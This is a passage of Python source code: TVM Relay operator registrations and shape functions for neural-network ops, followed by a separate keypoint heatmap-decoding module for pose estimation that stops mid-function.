reg.register_pattern("nn.adaptive_max_pool1d", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_avg_pool1d
reg.register_schedule("nn.adaptive_avg_pool1d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.adaptive_avg_pool1d", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_max_pool2d
reg.register_schedule("nn.global_max_pool2d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.global_max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# global_avg_pool2d
reg.register_schedule("nn.global_avg_pool2d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.global_avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_max_pool2d
reg.register_schedule("nn.adaptive_max_pool2d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.adaptive_max_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_avg_pool2d
reg.register_schedule("nn.adaptive_avg_pool2d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.adaptive_avg_pool2d", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_max_pool3d
reg.register_schedule("nn.adaptive_max_pool3d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.adaptive_max_pool3d", OpPattern.OUT_ELEMWISE_FUSABLE)
# adaptive_avg_pool3d
reg.register_schedule("nn.adaptive_avg_pool3d", strategy.schedule_adaptive_pool)
reg.register_pattern("nn.adaptive_avg_pool3d", OpPattern.OUT_ELEMWISE_FUSABLE)
# leaky_relu
reg.register_broadcast_schedule("nn.leaky_relu")
reg.register_pattern("nn.leaky_relu", OpPattern.ELEMWISE)
# prelu
reg.register_broadcast_schedule("nn.prelu")
reg.register_pattern("nn.prelu", OpPattern.BROADCAST)
# flatten
reg.register_broadcast_schedule("nn.batch_flatten")
reg.register_pattern("nn.batch_flatten", OpPattern.INJECTIVE)
# lrn
@reg.register_compute("nn.lrn")
def compute_lrn(attrs, inputs, out_dtype):
"""Compute definition of lrn"""
assert len(inputs) == 1
return [topi.nn.lrn(inputs[0], attrs.size, attrs.axis, attrs.alpha, attrs.beta, attrs.bias)]
reg.register_schedule("nn.lrn", strategy.schedule_lrn)
reg.register_pattern("nn.lrn", OpPattern.OPAQUE)
# upsampling
@reg.register_compute("nn.upsampling")
def compute_upsampling(attrs, inputs, out_dtype):
scale_h = attrs.scale_h
scale_w = attrs.scale_w
layout = attrs.layout
method = attrs.method
align_corners = attrs.align_corners
return [topi.nn.upsampling(inputs[0], scale_h, scale_w, layout, method, align_corners)]
reg.register_injective_schedule("nn.upsampling")
# upsampling3d
@reg.register_compute("nn.upsampling3d")
def compute_upsampling3d(attrs, inputs, out_dtype):
scale_d = attrs.scale_d
scale_h = attrs.scale_h
scale_w = attrs.scale_w
layout = attrs.layout
method = attrs.method
coordinate_transformation_mode = attrs.coordinate_transformation_mode
return [
topi.nn.upsampling3d(
inputs[0], scale_d, scale_h, scale_w, layout, method, coordinate_transformation_mode
)
]
reg.register_injective_schedule("nn.upsampling3d")
# pad
reg.register_broadcast_schedule("nn.pad")
# mirror_pad
@reg.register_compute("nn.mirror_pad")
def compute_mirror_pad(attrs, inputs, out_dtype):
pad_before, pad_after = list(zip(*attrs.pad_width))
mode = attrs.mode
out = topi.nn.mirror_pad(inputs[0], pad_before=pad_before, pad_after=pad_after, mode=mode)
return [out]
reg.register_broadcast_schedule("nn.mirror_pad")
@script
def _mirror_pad_func(data_shape, pad_width):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(data_shape.shape[0]):
out[i] = data_shape[i] + int64(pad_width[i][0]) + int64(pad_width[i][1])
return out
@reg.register_shape_func("nn.mirror_pad", False)
def mirror_pad_func(attrs, inputs, _):
pad_width_tuple = [get_const_tuple(p) for p in attrs.pad_width]
return [_mirror_pad_func(inputs[0], convert(pad_width_tuple))]
# conv2d_winograd related operators
reg.register_strategy(
"nn.contrib_conv2d_winograd_without_weight_transform",
strategy.conv2d_winograd_without_weight_transfrom_strategy,
)
reg.register_pattern(
"nn.contrib_conv2d_winograd_without_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE
)
# conv2d_gemm related operators
reg.register_strategy(
"nn.contrib_conv2d_gemm_without_weight_transform",
strategy.conv2d_gemm_without_weight_transform_strategy,
)
reg.register_pattern(
"nn.contrib_conv2d_gemm_without_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE
)
@reg.register_compute("nn.contrib_conv2d_gemm_weight_transform")
def compute_contrib_conv2d_gemm_weight_transform(attrs, inputs, out_dtype):
"""Compute definition of contrib_conv2d_gemm_weight_transform"""
out = topi.nn.conv2d_gemm_weight_transform(inputs[0], attrs.tile_rows, attrs.tile_cols)
return [out]
reg.register_schedule(
"nn.contrib_conv2d_gemm_weight_transform", strategy.schedule_conv2d_gemm_weight_transform
)
reg.register_pattern("nn.contrib_conv2d_gemm_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.contrib_conv2d_winograd_weight_transform")
def compute_contrib_conv2d_winograd_weight_transform(attrs, inputs, out_dtype):
"""Compute definition of contrib_conv2d_winograd_weight_transform"""
out = topi.nn.conv2d_winograd_weight_transform(inputs[0], attrs.get_int("tile_size"))
return [out]
reg.register_schedule(
"nn.contrib_conv2d_winograd_weight_transform",
strategy.schedule_conv2d_winograd_weight_transform,
)
reg.register_pattern("nn.contrib_conv2d_winograd_weight_transform", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_compute("nn.contrib_conv2d_winograd_nnpack_weight_transform")
def compute_contrib_conv2d_winograd_nnpack_weight_transform(attrs, inputs, out_dtype):
"""Compute definition of contrib_conv2d_winograd_nnpack_weight_transform"""
convolution_algorithm = attrs.get_int("convolution_algorithm")
out = topi.nn.conv2d_winograd_nnpack_weight_transform(
inputs[0], convolution_algorithm, out_dtype
)
return [out]
reg.register_schedule(
"nn.contrib_conv2d_winograd_nnpack_weight_transform",
strategy.schedule_conv2d_winograd_nnpack_weight_transform,
)
reg.register_pattern("nn.contrib_conv2d_winograd_nnpack_weight_transform", OpPattern.OPAQUE)
# conv2d_NCHWc
reg.register_strategy("nn.contrib_conv2d_NCHWc", strategy.conv2d_NCHWc_strategy)
reg.register_pattern("nn.contrib_conv2d_NCHWc", OpPattern.OUT_ELEMWISE_FUSABLE)
# depthwise_conv2d_NCHWc
reg.register_strategy("nn.contrib_depthwise_conv2d_NCHWc", strategy.depthwise_conv2d_NCHWc_strategy)
reg.register_pattern("nn.contrib_depthwise_conv2d_NCHWc", OpPattern.OUT_ELEMWISE_FUSABLE)
# deformable_conv2d
reg.register_strategy("nn.deformable_conv2d", strategy.deformable_conv2d_strategy)
reg.register_pattern("nn.deformable_conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_alter_op_layout("nn.deformable_conv2d")
def alter_op_layout_deformable_conv2d(attrs, inputs, tinfos, out_type):
"""Alternate the layout of deformable conv2d"""
return None
@reg.register_legalize("nn.deformable_conv2d")
def legalize_deformable_conv2d(attrs, inputs, types):
"""Legalize deformable conv2d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return None
@reg.register_convert_op_layout("nn.deformable_conv2d")
def convert_deformable_conv2d(attrs, inputs, tinfos, desired_layouts):
"""Convert Layout pass registration for deformable conv2d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
tinfos : list of types
List of input and output types
desired_layouts : list of layout strings
List of layouts defining our desired
layout for the data and kernel inputs respectively.
Returns
-------
result : tvm.relay.Expr
The transformed expr
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
data, offset, weight = inputs
new_attrs = dict(attrs)
for attr in new_attrs:
if isinstance(new_attrs[attr], container.Array):
new_attrs[attr] = list(new_attrs[attr])
elif isinstance(new_attrs[attr], expr.IntImm):
new_attrs[attr] = new_attrs[attr].value
# First check if there is a LayoutConfig scope, and if so, whether
# it indicates we should ignore this layer or not.
layout_config = LayoutConfig.current
if layout_config is not None:
skip_layer = layout_config.check_skip()
if skip_layer:
return relay.nn.deformable_conv2d(data, offset, weight, **new_attrs)
# Prepare new layout.
assert len(desired_layouts) == 2, "A desired layout is expected for data and kernel"
desired_data_layout, desired_kernel_layout = map(str, desired_layouts)
assert desired_data_layout != "default", "Data layout cannot be default"
new_attrs["data_layout"] = desired_data_layout
if desired_kernel_layout != "default":
new_attrs["kernel_layout"] = desired_kernel_layout
return relay.nn.deformable_conv2d(data, offset, weight, **new_attrs)
# Handle default kernel layouts
if desired_data_layout == "NCHW":
new_attrs["kernel_layout"] = "OIHW"
elif desired_data_layout == "NHWC":
new_attrs["kernel_layout"] = "HWIO"
else:
raise ValueError("Layout %s is not yet supported." % desired_data_layout)
return relay.nn.deformable_conv2d(data, offset, weight, **new_attrs)
# bitpack
@reg.register_compute("nn.bitpack")
def compute_bitpack(attrs, inputs, out_dtype):
"""Compute definition for bitpack"""
bits = attrs.bits
pack_axis = attrs.pack_axis
bit_axis = attrs.bit_axis
pack_type = attrs.pack_type
name = attrs.name
out = topi.nn.bitpack(inputs[0], bits, pack_axis, bit_axis, pack_type, name)
return [out]
reg.register_schedule("nn.bitpack", strategy.schedule_bitpack)
reg.register_pattern("nn.bitpack", OpPattern.INJECTIVE)
# bitserial_conv2d
reg.register_strategy("nn.bitserial_conv2d", strategy.bitserial_conv2d_strategy)
reg.register_pattern("nn.bitserial_conv2d", OpPattern.OUT_ELEMWISE_FUSABLE)
@reg.register_legalize("nn.bitserial_conv2d")
def legalize_bitserial_conv2d(attrs, inputs, types):
"""Legalize bitserial_conv2d op.
Parameters
----------
attrs : tvm.ir.Attrs
Attributes of current convolution
inputs : list of tvm.relay.Expr
The args of the Relay expr to be legalized
types : list of types
List of input and output types
Returns
-------
result : tvm.relay.Expr
The legalized expr
"""
return topi.nn.bitserial_conv2d_legalize(attrs, inputs, types)
# bitserial_dense
reg.register_strategy("nn.bitserial_dense", strategy.bitserial_dense_strategy)
reg.register_pattern("nn.bitserial_dense", reg.OpPattern.OUT_ELEMWISE_FUSABLE)
# cross_entropy
@reg.register_compute("nn.cross_entropy")
def compute_cross_entropy(attrs, inputs, out_dtype):
x, y = inputs
return [-topi.sum(topi.log(x) * y) / x.shape[0]]
reg.register_reduce_schedule("nn.cross_entropy")
reg.register_pattern("nn.cross_entropy", OpPattern.OPAQUE)
# dilate
@reg.register_compute("nn.dilate")
def compute_dilate(attrs, inputs, out_dtype):
return [topi.nn.dilate(inputs[0], attrs.strides, attrs.dilation_value)]
reg.register_broadcast_schedule("nn.dilate")
reg.register_pattern("nn.dilate", OpPattern.INJECTIVE)
# cross_entropy_with_logits
@reg.register_compute("nn.cross_entropy_with_logits")
def compute_cross_entropy_with_logits(attrs, inputs, out_dtype):
x, y = inputs
return [-topi.sum(x * y) / x.shape[0]]
reg.register_reduce_schedule("nn.cross_entropy_with_logits")
reg.register_pattern("nn.cross_entropy_with_logits", OpPattern.OPAQUE)
# nll_loss
@reg.register_compute("nn.nll_loss")
def compute_nll_loss(attrs, inputs, out_dtype):
predictions, targets, weights = inputs
return [topi.nn.nll_loss(predictions, targets, weights, attrs.reduction, attrs.ignore_index)]
reg.register_reduce_schedule("nn.nll_loss")
reg.register_pattern("nn.nll_loss", OpPattern.OUT_ELEMWISE_FUSABLE)
# depth_to_space
@reg.register_compute("nn.depth_to_space")
def compute_depth_to_space(attrs, inputs, out_dtype):
block_size = attrs.block_size
layout = attrs.layout
mode = attrs.mode
return [topi.nn.depth_to_space(inputs[0], block_size, layout=layout, mode=mode)]
reg.register_injective_schedule("nn.depth_to_space")
reg.register_pattern("nn.depth_to_space", OpPattern.INJECTIVE)
# space_to_depth
@reg.register_compute("nn.space_to_depth")
def compute_space_to_depth(attrs, inputs, out_dtype):
block_size = attrs.block_size
layout = attrs.layout
return [topi.nn.space_to_depth(inputs[0], block_size, layout=layout)]
reg.register_injective_schedule("nn.space_to_depth")
reg.register_pattern("nn.space_to_depth", OpPattern.INJECTIVE)
# correlation
reg.register_strategy("nn.correlation", strategy.correlation_strategy)
reg.register_pattern("nn.correlation", OpPattern.OUT_ELEMWISE_FUSABLE)
# space_to_batch_nd and batch_to_space_nd
reg.register_injective_schedule("nn.space_to_batch_nd")
reg.register_injective_schedule("nn.batch_to_space_nd")
#####################
# Shape functions #
#####################
@script
def _conv_shape_func(dshape, kshape, strides, padding, dilation):
out = output_tensor((dshape.shape[0],), "int64")
out[0] = dshape[0]
out[1] = kshape[0]
for i in const_range(dshape.shape[0] - 2):
dilated_k = (kshape[i + 2] - 1) * dilation[i] + 1
out[i + 2] = (dshape[i + 2] + 2 * padding[i] - dilated_k) // strides[i] + 1
return out
def conv_shape_func(attrs, inputs, _):
"""
    Shape function for conv1d, conv2d and conv3d ops (channel-first layouts).
"""
strides = get_const_tuple(attrs.strides)
padding = get_const_tuple(attrs.padding)
dilation = get_const_tuple(attrs.dilation)
return [
_conv_shape_func(
inputs[0],
inputs[1],
convert(strides),
convert(padding),
convert(dilation),
)
]
reg.register_shape_func("nn.conv1d", False, conv_shape_func)
reg.register_shape_func("nn.conv2d", False, conv_shape_func)
reg.register_shape_func("nn.conv3d", False, conv_shape_func)
@script
def _conv2d_NCHWc_shape_func(dshape, kshape, strides, padding, dilation, oc_bn):
out = output_tensor((dshape.shape[0],), "int64")
ic_chunk = dshape[1]
height = dshape[2]
width = dshape[3]
ic_bn = dshape[4]
kheight = kshape[2]
kwidth = kshape[3]
dilated_kh = (kheight - 1) * dilation[0] + 1
dilated_kw = (kwidth - 1) * dilation[1] + 1
kflatten = int64(1)
for i in const_range(kshape.shape[0]):
kflatten *= kshape[i]
oc = kflatten // (kheight * kwidth * ic_chunk * ic_bn)
oc_chunk = oc // oc_bn
out_height = (height + 2 * padding[0] - dilated_kh) // strides[0] + 1
out_width = (width + 2 * padding[1] - dilated_kw) // strides[1] + 1
out[0] = dshape[0]
out[1] = oc_chunk
out[2] = out_height
out[3] = out_width
out[4] = int64(oc_bn)
return out
@reg.register_shape_func("nn.contrib_conv2d_NCHWc", False)
def conv2d_NCHWc_shape_func(attrs, inputs, _):
"""
Shape function for contrib_conv2d_NCHWc op.
"""
strides = get_const_tuple(attrs.strides)
padding = get_const_tuple(attrs.padding)
dilation = get_const_tuple(attrs.dilation)
out_layout = attrs.out_layout
oc_bn = int(out_layout[4:-1])
return [
_conv2d_NCHWc_shape_func(
inputs[0],
inputs[1],
convert(strides),
convert(padding),
convert(dilation),
convert(oc_bn),
)
]
@script
def _conv2d_transpose_nchw_shape_func(dshape, kshape, strides, padding, dilation, output_padding):
out = output_tensor((dshape.shape[0],), "int64")
kheight = kshape[2]
kwidth = kshape[3]
dilated_kh = (kheight - 1) * dilation[0] + 1
dilated_kw = (kwidth - 1) * dilation[1] + 1
out_height = strides[0] * (dshape[2] - 1) + dilated_kh - 2 * padding[0] + output_padding[0]
out_width = strides[1] * (dshape[3] - 1) + dilated_kw - 2 * padding[1] + output_padding[1]
out[0] = dshape[0]
out[1] = kshape[1]
out[2] = out_height
out[3] = out_width
return out
@reg.register_shape_func("nn.conv2d_transpose", False)
def conv2d_transpose_nchw_shape_func(attrs, inputs, _):
"""
Shape function for conv2d_transpose op.
"""
strides = get_const_tuple(attrs.strides)
padding = get_const_tuple(attrs.padding)
dilation = get_const_tuple(attrs.dilation)
output_padding = get_const_tuple(attrs.output_padding)
return [
_conv2d_transpose_nchw_shape_func(
inputs[0],
inputs[1],
convert(strides),
convert(padding),
convert(dilation),
convert(output_padding),
)
]
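# Worked example for _conv2d_transpose_nchw_shape_func (illustrative numbers
# only): with dshape = (1, 16, 32, 32), kshape = (16, 8, 4, 4),
# strides = (2, 2), padding = (1, 1), dilation = (1, 1) and
# output_padding = (0, 0), the dilated kernel extent is 4, so
# out_height = out_width = 2 * (32 - 1) + 4 - 2 * 1 + 0 = 64 and the output
# shape is (1, 8, 64, 64).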
@script
def _pool2d_shape_func(data_shape, pool_size, strides, padding, height_axis, width_axis):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(data_shape.shape[0]):
if i == height_axis:
out[i] = (data_shape[i] + padding[0] + padding[2] - pool_size[0]) // strides[0] + 1
elif i == width_axis:
out[i] = (data_shape[i] + padding[1] + padding[3] - pool_size[1]) // strides[1] + 1
else:
out[i] = data_shape[i]
return out
def pool2d_shape_func(attrs, inputs, _):
"""
Shape function for pool2d op.
"""
pool_size = get_const_tuple(attrs.pool_size)
strides = get_const_tuple(attrs.strides)
padding = get_const_tuple(attrs.padding)
layout = attrs.layout
height_axis = layout.index("H")
width_axis = layout.index("W")
if len(padding) == 1:
padding = [padding[0]] * 4
elif len(padding) == 2:
padding = [padding[0], padding[1], padding[0], padding[1]]
return [
_pool2d_shape_func(
inputs[0],
convert(pool_size),
convert(strides),
convert(padding),
convert(height_axis),
convert(width_axis),
)
]
reg.register_shape_func("nn.max_pool2d", False, pool2d_shape_func)
reg.register_shape_func("nn.avg_pool2d", False, pool2d_shape_func)
@script
def _global_pool2d_shape_func(data_shape, height_axis, width_axis):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0]):
if i == height_axis or i == width_axis:
out[i] = int64(1)
else:
out[i] = data_shape[i]
return out
def global_pool2d_shape_func(attrs, inputs, _):
"""
Shape function for global pool2d op.
"""
layout = attrs.layout
height_axis = width_axis = 1
for i, letter in enumerate(layout):
if letter == "H":
height_axis = i
if letter == "W":
width_axis = i
return [_global_pool2d_shape_func(inputs[0], convert(height_axis), convert(width_axis))]
reg.register_shape_func("nn.global_max_pool2d", False, global_pool2d_shape_func)
reg.register_shape_func("nn.global_avg_pool2d", False, global_pool2d_shape_func)
@script
def _batch_flatten_shape_func(data_shape):
out = output_tensor((2,), "int64")
out[0] = data_shape[0]
out[1] = int64(1)
for i in const_range(data_shape.shape[0] - 1):
out[1] *= data_shape[i + 1]
return out
@reg.register_shape_func("nn.batch_flatten", False)
def batch_flatten_shape_func(attrs, inputs, _):
"""
Shape function for batch_flatten op.
"""
return [_batch_flatten_shape_func(inputs[0])]
@script
def _dense_shape_func(data_shape, weight_shape):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0] - 1):
out[i] = data_shape[i]
out[out.shape[0] - 1] = weight_shape[0]
return out
@reg.register_shape_func("nn.dense", False)
def dense_shape_func(attrs, inputs, _):
"""
Shape function for dense op.
"""
ret = [_dense_shape_func(inputs[0], inputs[1])]
return ret
@script
def _dense_pack_shape_func(data_shape, weight_shape):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0] - 1):
out[i] = data_shape[i]
out[out.shape[0] - 1] = weight_shape[0] * weight_shape[2]
return out
@reg.register_shape_func("nn.contrib_dense_pack", False)
def dense_pack_shape_func(attrs, inputs, _):
"""
Shape function for dense_pack op.
"""
ret = [_dense_pack_shape_func(inputs[0], inputs[1])]
return ret
@script
def _batch_matmul_shape_func(data_shape, weight_shape):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0] - 1):
if i == 0:
out[i] = max(data_shape[i], weight_shape[i])
else:
out[i] = data_shape[i]
out[out.shape[0] - 1] = weight_shape[weight_shape.shape[0] - 2]
return out
@reg.register_shape_func("nn.batch_matmul", False)
def batch_matmul_shape_func(attrs, inputs, _):
"""
    Shape function for batch_matmul op.
"""
ret = [_batch_matmul_shape_func(inputs[0], inputs[1])]
return ret
@script
def _pad_shape_func(data_shape, pad_width):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0]):
out[i] = data_shape[i] + pad_width[i][0] + pad_width[i][1]
return out
@reg.register_shape_func("nn.pad", False)
def pad_shape_func(attrs, inputs, _):
"""
Shape function for pad op.
"""
pad_width = []
for pair in attrs.pad_width:
pad_width.append(get_const_tuple(pair))
return [_pad_shape_func(inputs[0], convert(pad_width))]
@script
def _dilate_shape_func(data_shape, strides):
out = output_tensor((data_shape.shape[0],), "int64")
for i in const_range(out.shape[0]):
out[i] = (data_shape[i] - 1) * strides[i] + 1
return out
@reg.register_shape_func("nn.dilate", False)
def dilate_shape_func(attrs, inputs, _):
"""
Shape function for dilate op.
"""
return [_dilate_shape_func(inputs[0], convert(attrs.strides))]
reg.register_shape_func("nn.bias_add", False, elemwise_shape_func)
reg.register_shape_func("nn.softmax", False, elemwise_shape_func)
reg.register_shape_func("nn.relu", False, elemwise_shape_func)
|
the-stack_106_22061
|
import numpy as np
import warnings
import cv2
import torch
def topdownhead_decode_heatmaps_without_cs(output):
"""Decode keypoints from heatmaps.
    Args:
        output (np.ndarray[N, K, H, W]): model predicted heatmaps.
    Returns:
        torch.Tensor[N, K, 3]: decoded keypoint (x, y) locations and scores.
    """
batch_size = output.shape[0]
preds, maxvals = keypoints_from_heatmaps_without_cs(output)
all_preds = torch.zeros(
(batch_size, preds.shape[1], 3), dtype=torch.float32)
all_preds[:, :, 0:2] = preds[:, :, 0:2]
all_preds[:, :, 2:3] = maxvals
return all_preds
def keypoints_from_heatmaps_without_cs(
heatmaps,
unbiased=False,
post_process="default",
kernel=11,
valid_radius_factor=0.0546875,
use_udp=False,
target_type="GaussianHeatmap",
):
"""Get final keypoint predictions from heatmaps and transform them back to
the image.
Note:
batch size: N
num keypoints: K
heatmap height: H
heatmap width: W
Args:
heatmaps (np.ndarray[N, K, H, W]): model predicted heatmaps.
post_process (str/None): Choice of methods to post-process
heatmaps. Currently supported: None, 'default', 'unbiased',
'megvii'.
unbiased (bool): Option to use unbiased decoding. Mutually
exclusive with megvii.
Note: this arg is deprecated and unbiased=True can be replaced
by post_process='unbiased'
Paper ref: Zhang et al. Distribution-Aware Coordinate
Representation for Human Pose Estimation (CVPR 2020).
kernel (int): Gaussian kernel size (K) for modulation, which should
match the heatmap gaussian sigma when training.
K=17 for sigma=3 and k=11 for sigma=2.
valid_radius_factor (float): The radius factor of the positive area
in classification heatmap for UDP.
use_udp (bool): Use unbiased data processing.
target_type (str): 'GaussianHeatmap' or 'CombinedTarget'.
GaussianHeatmap: Classification target with gaussian distribution.
CombinedTarget: The combination of classification target
(response map) and regression target (offset map).
Paper ref: Huang et al. The Devil is in the Details: Delving into
Unbiased Data Processing for Human Pose Estimation (CVPR 2020).
Returns:
tuple: A tuple containing keypoint predictions and scores.
        - preds (np.ndarray[N, K, 2]): Predicted keypoint locations in heatmap coordinates.
- maxvals (np.ndarray[N, K, 1]): Scores (confidence) of the keypoints.
"""
    # detect conflicting post-processing options
if unbiased:
assert post_process not in [False, None, "megvii"]
if post_process in ["megvii", "unbiased"]:
assert kernel > 0
if use_udp:
assert not post_process == "megvii"
# normalize configs
if post_process is False:
warnings.warn(
"post_process=False is deprecated, " "please use post_process=None instead",
DeprecationWarning,
)
post_process = None
elif post_process is True:
if unbiased is True:
warnings.warn(
"post_process=True, unbiased=True is deprecated,"
" please use post_process='unbiased' instead",
DeprecationWarning,
)
post_process = "unbiased"
else:
warnings.warn(
"post_process=True, unbiased=False is deprecated, "
"please use post_process='default' instead",
DeprecationWarning,
)
post_process = "default"
elif post_process == "default":
if unbiased is True:
warnings.warn(
"unbiased=True is deprecated, please use "
"post_process='unbiased' instead",
DeprecationWarning,
)
post_process = "unbiased"
# start processing
if post_process == "megvii":
heatmaps = _gaussian_blur(heatmaps, kernel=kernel)
N, K, H, W = heatmaps.shape
if use_udp:
if target_type.lower() == "GaussianHeatMap".lower():
preds, maxvals = _get_max_preds_tensor(heatmaps)
preds = post_dark_udp(preds, heatmaps, kernel=kernel)
elif target_type.lower() == "CombinedTarget".lower():
for person_heatmaps in heatmaps:
for i, heatmap in enumerate(person_heatmaps):
kt = 2 * kernel + 1 if i % 3 == 0 else kernel
cv2.GaussianBlur(heatmap, (kt, kt), 0, heatmap)
# valid radius is in direct proportion to the height of heatmap.
valid_radius = valid_radius_factor * H
offset_x = heatmaps[:, 1::3, :].flatten() * valid_radius
offset_y = heatmaps[:, 2::3, :].flatten() * valid_radius
heatmaps = heatmaps[:, ::3, :]
preds, maxvals = _get_max_preds_tensor(heatmaps)
index = preds[..., 0] + preds[..., 1] * W
index += W * H * np.arange(0, N * K / 3)
index = index.astype(int).reshape(N, K // 3, 1)
preds += np.concatenate((offset_x[index], offset_y[index]), axis=2)
else:
raise ValueError(
"target_type should be either " "'GaussianHeatmap' or 'CombinedTarget'"
)
else:
preds, maxvals = _get_max_preds_tensor(heatmaps)
if post_process == "unbiased": # alleviate biased coordinate
# apply Gaussian distribution modulation.
heatmaps = np.log(np.maximum(
_gaussian_blur(heatmaps, kernel), 1e-10))
for n in range(N):
for k in range(K):
preds[n][k] = _taylor(heatmaps[n][k], preds[n][k])
elif post_process is not None:
pass
# add +/-0.25 shift to the predicted locations for higher acc.
# this is default behavior
# for n in range(N):
# for k in range(K):
# heatmap = heatmaps[n][k]
# px = int(preds[n][k][0])
# py = int(preds[n][k][1])
# if 1 < px < W - 1 and 1 < py < H - 1:
# diff = torch.tensor(
# [
# heatmap[py][px + 1] - heatmap[py][px - 1],
# heatmap[py + 1][px] - heatmap[py - 1][px],
# ]
# )
# preds[n][k] += torch.sign(diff) * 0.25
# if post_process == "megvii":
# preds[n][k] += 0.5
return preds, maxvals
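def _decode_usage_sketch():
    """Minimal smoke-test sketch for the decoder above (illustrative only;
    not referenced elsewhere in this module). With the default arguments the
    decoder takes a torch tensor of heatmaps and returns keypoint locations
    in heatmap space together with their peak responses.
    """
    heatmaps = torch.rand(2, 17, 64, 48)  # (N, K, H, W)
    preds, maxvals = keypoints_from_heatmaps_without_cs(heatmaps)
    # preds: (2, 17, 2) x/y locations, maxvals: (2, 17, 1) confidence scores
    return preds, maxvals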
def _taylor(heatmap, coord):
"""Distribution aware coordinate decoding method.
Note:
heatmap height: H
heatmap width: W
Args:
heatmap (np.ndarray[H, W]): Heatmap of a particular joint type.
coord (np.ndarray[2,]): Coordinates of the predicted keypoints.
Returns:
np.ndarray[2,]: Updated coordinates.
"""
H, W = heatmap.shape[:2]
px, py = int(coord[0]), int(coord[1])
if 1 < px < W - 2 and 1 < py < H - 2:
dx = 0.5 * (heatmap[py][px + 1] - heatmap[py][px - 1])
dy = 0.5 * (heatmap[py + 1][px] - heatmap[py - 1][px])
dxx = 0.25 * (heatmap[py][px + 2] - 2 *
heatmap[py][px] + heatmap[py][px - 2])
dxy = 0.25 * (
heatmap[py + 1][px + 1]
- heatmap[py - 1][px + 1]
- heatmap[py + 1][px - 1]
+ heatmap[py - 1][px - 1]
)
dyy = 0.25 * (
heatmap[py + 2 * 1][px] - 2 *
heatmap[py][px] + heatmap[py - 2 * 1][px]
)
derivative = np.array([[dx], [dy]])
hessian = np.array([[dxx, dxy], [dxy, dyy]])
if dxx * dyy - dxy ** 2 != 0:
hessianinv = np.linalg.inv(hessian)
offset = -hessianinv @ derivative
offset = np.squeeze(np.array(offset.T), axis=0)
coord += offset
return coord
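# Note on _taylor above (a sketch of the math from the DARK paper): in the
# "unbiased" branch the heatmap has already been log-transformed, call it f.
# The refinement is a single Newton step
#     coord' = coord - H(f)^{-1} @ grad(f)
# with grad(f) = [dx, dy] and H(f) = [[dxx, dxy], [dxy, dyy]] estimated by
# central finite differences at the integer peak location.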
def post_dark_udp(coords, batch_heatmaps, kernel=3):
"""DARK post-pocessing. Implemented by udp. Paper ref: Huang et al. The
Devil is in the Details: Delving into Unbiased Data Processing for Human
Pose Estimation (CVPR 2020). Zhang et al. Distribution-Aware Coordinate
Representation for Human Pose Estimation (CVPR 2020).
Note:
batch size: B
num keypoints: K
num persons: N
height of heatmaps: H
width of heatmaps: W
B=1 for bottom_up paradigm where all persons share the same heatmap.
B=N for top_down paradigm where each person has its own heatmaps.
Args:
coords (np.ndarray[N, K, 2]): Initial coordinates of human pose.
batch_heatmaps (np.ndarray[B, K, H, W]): batch_heatmaps
kernel (int): Gaussian kernel size (K) for modulation.
Returns:
res (np.ndarray[N, K, 2]): Refined coordinates.
"""
if not isinstance(batch_heatmaps, np.ndarray):
batch_heatmaps = batch_heatmaps.cpu().numpy()
B, K, H, W = batch_heatmaps.shape
N = coords.shape[0]
assert B == 1 or B == N
for heatmaps in batch_heatmaps:
for heatmap in heatmaps:
cv2.GaussianBlur(heatmap, (kernel, kernel), 0, heatmap)
np.clip(batch_heatmaps, 0.001, 50, batch_heatmaps)
np.log(batch_heatmaps, batch_heatmaps)
batch_heatmaps = np.transpose(
batch_heatmaps, (2, 3, 0, 1)).reshape(H, W, -1)
batch_heatmaps_pad = cv2.copyMakeBorder(
batch_heatmaps, 1, 1, 1, 1, borderType=cv2.BORDER_REFLECT
)
batch_heatmaps_pad = np.transpose(
batch_heatmaps_pad.reshape(H + 2, W + 2, B, K), (2, 3, 0, 1)
).flatten()
index = coords[..., 0] + 1 + (coords[..., 1] + 1) * (W + 2)
index += (W + 2) * (H + 2) * np.arange(0, B * K).reshape(-1, K)
index = index.astype(int).reshape(-1, 1)
i_ = batch_heatmaps_pad[index]
ix1 = batch_heatmaps_pad[index + 1]
iy1 = batch_heatmaps_pad[index + W + 2]
ix1y1 = batch_heatmaps_pad[index + W + 3]
ix1_y1_ = batch_heatmaps_pad[index - W - 3]
ix1_ = batch_heatmaps_pad[index - 1]
iy1_ = batch_heatmaps_pad[index - 2 - W]
dx = 0.5 * (ix1 - ix1_)
dy = 0.5 * (iy1 - iy1_)
derivative = np.concatenate([dx, dy], axis=1)
derivative = derivative.reshape(N, K, 2, 1)
dxx = ix1 - 2 * i_ + ix1_
dyy = iy1 - 2 * i_ + iy1_
